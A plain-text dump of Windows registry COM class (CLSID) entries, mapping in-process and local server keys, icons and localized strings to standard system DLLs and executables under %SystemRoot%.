%SystemRoot%\system32\Windows.Management.SecureAssessment.CfgProvider.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6295DF27-35EE-11D1-8707-00C04FD93327}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\SyncCenter.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6295DF2D-35EE-11D1-8707-00C04FD93327}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mobsync.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{62AD5CB4-F168-4B95-8AAE-6F47A75D5D30}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\oobe\UserOOBEBroker.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{62AE1F9A-126A-11D0-A14B-0800361B1103}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\dsuiext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{62ba9430-9624-46ec-9034-d5ffabb0fca0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{62D3F5B6-7C5F-4914-82AF-E3C39743F380}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\CspCellularSettings.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{62D8ED13-C9D0-4CE8-A914-47DD628FB1B0} InfoTip REG_EXPAND_SZ @%SystemRoot%\System32\intl.cpl,-2#immutable1 LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\intl.cpl,-3#immutable1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{62D8ED13-C9D0-4CE8-A914-47DD628FB1B0}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\intl.cpl,-200 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{62D8ED13-C9D0-4CE8-A914-47DD628FB1B0}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\intl.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{62dc1a93-ae24-464c-a43e-452f824c4250}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\WMALFXGFXDSP.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{62E607F5-D6C2-4F5C-92EF-0D68452F5715}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\PackageStateRoaming.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6311429E-2F1A-4777-880F-C7289FD10169}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ntshrui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{631E88E6-45C5-40DC-B2D4-28B732E45F96}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{63480537-5d3d-4c42-8ac4-22a2bc016244}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\WaaSMedicPS.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{636B1538-4AD1-4FA5-831A-403D7146B11D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{636B9F10-0C7D-11D1-95B2-0020AFDC7421}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dmusic.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{636c15cf-df63-4790-866a-117163d10a46}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\tsmf.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{637118F4-0E4E-4C90-BC39-161165F55B6E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\lockcontroller.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6377013E-2C35-40F3-B8E1-1AB47D12982B}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\WABSyncProvider.dll,0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6377013E-2C35-40F3-B8E1-1AB47D12982B}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\WABSyncProvider.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{637c490d-eee3-4c0a-973f-371958802da2}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\WMALFXGFXDSP.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{639bdb5a-7959-48d4-afc3-44f252bf2924}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{63B51F81-C868-11D0-999C-00C04FD655E1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{63C04987-37C1-4CE6-9A11-4E0C1F8FC2A9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\enterprisecsps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{63da6ec0-2e98-11cf-8d82-444553540000}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-73 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{63da6ec0-2e98-11cf-8d82-444553540000}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\msieftp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{63df056d-a8c7-4a2e-87ff-215de332c21f}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfsvr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{63E23168-BFF7-4E87-A246-EF024425E4EC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\GPEdit.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{641ABA69-56FD-4029-A445-4D8375D3A699}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\UIAnimation.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{64226369-CCEB-477D-88D5-7A9CB465BEAC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\IdCtrls.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{643B0017-1AAE-4AFA-B921-4BE3FB8308A2}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\tspubwmi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E} InfoTip REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-22915 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-8964 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-55 Empty REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-55 Full REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-54 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6468e186-485e-47e4-83d8-8d9318675219}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\credprovhost.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{64693913-1c21-4f30-a98f-4e52906d3b56}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6473E7E7-D8D6-4696-9FBB-9F41DF134B7B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\provsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{647BD8C2-658B-4ECA-ABC7-FC5C0BF1704D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\tscfgwmi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{64B8F404-A4AE-11D1-B7B6-00C04FB926AF}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\es.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{64BA50D0-40FD-4FD0-A846-65A2ACE6A075}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\WpcRefreshTask.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{64BC32B5-4EEC-4de7-972D-BD8BD0324537}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{650503CF-9108-4DDC-A2CE-6C2341E1C582} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\wuapi.dll,-63525 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6515834D-6125-4878-A3A3-6B0A73B809A2}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\WMIPJOBJ.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6522CF99-94C7-4958-B18D-4F6159E6926B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{652527C4-4A72-4bd3-BFAB-4B06AB172D7C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{65303443-AD66-11D1-9D65-00C04FC30DF6}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\oleprn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6543D242-A80B-44A3-B828-95C1EC452423}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\wbemcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{655D9BF9-3876-43D0-B6E8-C83C1224154C}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{65A04334-9DD4-4FA2-94DB-A62922B8BA24}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\twinui.appcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{65a5160f-a093-48b9-8f79-05098d5087ad}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\exsmime.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66182EC4-AFD1-11d2-9CB9-0000F87A369E}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\adsnt.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66275315-bfa5-451b-88b6-e56ebc8d9b58}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{667955AD-6B3B-43CA-B949-BC69B5BAFF7F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\dpnet.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66D0DB14-5638-475f-A386-629522D8C461}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\configmanager2.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66d56b60-97b7-4e6a-9aa1-3ec5e3fdaa0f}\InProcServer32 (Default) REG_EXPAND_SZ %SYSTEMROOT%\system32\WinsockHC.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66e4e4fb-f385-4dd0-8d74-a2efd1bc6178}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66eea0f5-001a-4073-a496-783f86fcf4c0} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-50130 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66eea0f5-001a-4073-a496-783f86fcf4c0}\Elevation IconResource REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-320 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66eea0f5-001a-4073-a496-783f86fcf4c0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6705C562-0AE7-40EA-8474-F39DAB1813D0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\RasMM.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6746c347-576b-4f73-9012-cdfeea251bc4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.Search.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\fastprox.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6756A641-DE71-11d0-831B-00AA005B4383}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{67677441-3350-45B4-9455-4D7F4A50F4E4}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{67718415-c450-4f3c-bf8a-b487642dc39b}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-87 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{67718415-c450-4f3c-bf8a-b487642dc39b}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\optionalfeatures.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{677561f9-50fc-4b24-921d-eacb89706059}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\CellularAPI.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6785BFAC-9D2D-4be5-B7E2-59937E8FB80A} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-50688 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6785BFAC-9D2D-4be5-B7E2-59937E8FB80A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{679f85cb-0220-4080-b29b-5540cc05aab6}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll,-51380 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{679f85cb-0220-4080-b29b-5540cc05aab6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{67a33041-b8aa-4429-b02a-60f8d007c29e}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mssrch.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{67A66362-050E-42ff-B241-82C1F51EA9B9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{67CA7650-96E6-4FDD-BB43-A8E774F73A57} InfoTip REG_EXPAND_SZ @%SystemRoot%\System32\hgcpl.dll,-2#immutable1 LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\hgcpl.dll,-1#immutable1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{67CA7650-96E6-4FDD-BB43-A8E774F73A57}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-1013 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{67CA7650-96E6-4FDD-BB43-A8E774F73A57}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shdocvw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{67CA7650-96E6-4FDD-BB43-A8E774F73A57}\Instance\InitPropertyBag ResourceDLL REG_EXPAND_SZ %SystemRoot%\System32\hgcpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{67EA3D48-83F2-408C-AD46-97F207D79DB3}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{682159d9-c321-47ca-b3f1-30e36b2ec8b9}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\explorer.exe /factory,{682159d9-c321-47ca-b3f1-30e36b2ec8b9} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{683a732e-eee1-4aec-8b45-455890e87ff1}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\WwanConn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{687607A0-6BA1-4355-99F4-4E3D749FFB19}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wlandlg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{687734A3-65F2-43E5-B9AE-E775B351FD2C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\netcorehc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{68b07bff-cb50-4d60-a7d5-02b1a523bc8c}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{68b07bff-cb50-4d60-a7d5-02b1a523bc8c}\Instance\InitPropertyBag DefaultIcon REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-1025 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{68c67565-410e-45e6-8560-4091ae193481}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\colbact.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{68DB2410-63D2-4D4A-9449-FBD53FA4E7A3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\oobe\msoobeplugins.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{68ddbb56-9d1d-4fd9-89c5-c0da2a625392}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\stobject.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{68E1DF8C-9512-4801-A105-25A44DCCB164}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\cscui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{68E3F2FD-31AE-4441-BB6A-FD7047525F90}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{68e52c1c-37cb-41d2-afe1-1e77d5f10676}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6935DB93-21E8-4ccc-BEB9-9FE3C77A297A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{69375D35-B310-40fd-A7DC-9548E1DBC3B5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\cscui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{693BADEA-1EB1-4013-B799-285F624A55BD}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\audioeng.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{69546697-5b53-43c5-8391-9e227b54957b}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\appwiz.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{698F7D05-37F0-4902-8A63-AEF7D44DC7FC} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\pwlauncher.dll,-202 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{699583D1-6BA0-4DF2-B559-2487ED3A58CB}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSync.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{699745C2-5066-4B82-A8E3-D40478DBEC8C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{69A25C12-1811-11D2-A52B-0000F803A951}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\certmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{69A25C14-1811-11D2-A52B-0000F803A951}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\certmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{69a568cf-86d1-4e47-b1fc-a74a110583fb}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{69A95A38-C637-46A0-9FB2-1C939AEBF2E8}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\audioses.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{69BE8BB4-D66D-47C8-865A-ED1589433782}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{69D76D1B-B12E-4913-8F48-671B90195A2B}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wbem\policman.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{69F31C37-09E1-433b-AECB-EBC83E4065D9}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mssrch.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{69F9CB25-25E2-4BE1-AB8F-07AA7CB535E8}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mobsync.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6A205B57-2567-4a2c-B881-F787FAB579A3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6A323D92-38A8-449B-8A98-CB1CF3903F5B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\PrintPlatformConfig.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6A49950E-CE8A-4EF7-88B4-9D112366511C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\softkbd.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6A5B0C7C-5CCB-4F10-A043-B8DE007E1952}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\MsRdpWebAccess.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6A5FEA5B-BF8F-4EE5-B8C3-44D8A0D7331C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\fhcfg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6A68CC80-4337-4dbc-BD27-FBFB1053820B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\tquery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6A6F4B83-45C5-4ca9-BDD9-0D81C12295E4}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mstscax.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6aa17c06-0c75-4006-81a9-57927e77ae87}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6ACB028E-48C0-4A44-964C-E14567C578BA}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\sppwmi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6AE29350-321B-42be-BBE5-12FB5270C0DE}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mstscax.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6AFCCE9E-85F0-475C-944E-9357B84A4975}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wlanpref.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6AFE625A-6ED7-4475-BD04-47170B77D584}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncCore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6b19c2a9-50ba-4275-b99b-13dcf69b9f19}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\NfcRadioMedia.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6B2D6BA0-9F3E-4f27-920B-313CC426A39E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\OpcServices.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6b33163c-76a5-4b6c-bf21-45de9cd503a1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shwebsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6B34D24A-213B-4929-A8A1-F0A94EBDC8BF}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\MaintenanceUI.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6b3598cc-db4d-4992-95b9-5d7d327c0dc7}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\rastlsext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6B462062-7CBF-400D-9FDB-813DD10F2778}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6B56A227-7150-4A1F-A114-C959EB8F8C24}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\appmgmts.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6B6F9D2D-6D49-4026-83A6-86DFC1C3C6F0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6B8195EE-950E-4F71-86F3-ADD77B191420}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\twinui.appcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6B831E4F-A50D-45FC-842F-16CE27595359}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BA8349F-FDF4-4246-A724-32C943AED24F}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\SebBackgroundManagerPolicy.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC09692-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\iasrecst.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC0969D-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iassvcs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC0969F-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iassvcs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC096A0-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iassvcs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC096B1-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\iaspolcy.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC096B3-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\iaspolcy.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC096B7-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iasacct.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC096B8-0CE6-11D1-BAAE-00C04FC2E20D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iasacct.dll 